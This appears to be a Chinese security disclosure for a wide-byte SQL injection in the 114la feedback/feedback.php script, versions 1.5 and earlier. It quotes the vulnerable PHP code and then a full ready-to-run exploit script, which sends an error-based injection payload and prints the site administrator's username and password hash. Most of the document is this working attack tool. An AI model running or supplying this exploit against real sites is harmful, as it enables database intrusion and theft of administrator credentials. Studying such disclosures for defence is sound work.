漏洞文件 feedback/feedback.php
影响版本<=1.5 代码:
- $username = emptyempty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
- $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
- $content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
- (emptyempty($content)) && $error_msg .= ',意见及建议 ';
-
- if (!emptyempty($error_msg))
- {
- throw new Exception($error_msg, 11);
- }
-
- $content = htmlspecialchars($content, ENT_QUOTES);
- if (strlen($content) > 600 || strlen($content) < 40) { throw new Exception('请将您的描述控制在 20 - 300 字,更多内容请您分次提交。', 1); }
- {
- throw new Exception('抱歉,24 小时内您只能提交 ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
- }
- $old_cookie++;
-
- if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
- array($username, $email, $content, time())))
- {
- throw new Exception('抱歉,信息提交失败,请重试。', 1);
- }
- else
- {
-
- if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)
- {
- setcookie('dfstime', time(), time() + 86400);
- setcookie('fdnum', $old_cookie, time() + 86400);
- }
- else
- {
- setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
- }
-
- throw new Exception('
- <div class="success">提交成功,感谢您的反馈! <a href="'. URL .'/">返回首页</a></div>
- ', 3);
- unset($username, $email, $content);
- }
EXP代码:
- <?php
- $sbcopyright='
- ----------------------------------------
- 114la feedback injection Vul Exploit
- By xZL
- Team: www.0kee.com
- 2011.04.02
-
- Usage: php '.$argv[0].' host /path
- Example: php '.$argv[0].' www.nxadmin.com /
- ----------------------------------------
- ';
- if ($argc < 3) {
- print_r($sbcopyright);
- die();
- }
-
- ob_start();
- $url = $argv[1];
- $path= $argv[2];
-
- $sock = fsockopen("$url", 80, $errno, $errstr, 30);
- if (!$sock) die("$errstr ($errno)\n");
- $data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
-
- fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
- fwrite($sock, "Accept: */*\r\n");
- fwrite($sock, "Referer: http://$url/#M\r\n");
- fwrite($sock, "Accept-Language: zh-cn\r\n");
- fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
- fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
- fwrite($sock, "User-Agent: Mozilla\r\n");
- fwrite($sock, "Host: $url\r\n");
- fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
- fwrite($sock, "Connection: Keep-Alive\r\n");
- fwrite($sock, "Cache-Control: no-cache\r\n");
- fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n");
- fwrite($sock, $data);
-
- $headers = "";
- while ($str = trim(fgets($sock, 4096)))
- $headers .= "$str\n";
- echo "\n";
- $body = "";
- while (!feof($sock))
- $body .= fgets($sock, 4096);
-
- fclose($sock);
-
- if (strpos($body, 'Duplicate entry') !== false) {
- preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
- $result=explode("_",$arr[1]);
- print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\nGood Luck!");
- }else{
- print_r("Exploit Failed! \n");
- }
-
- ob_end_flush();
- ?>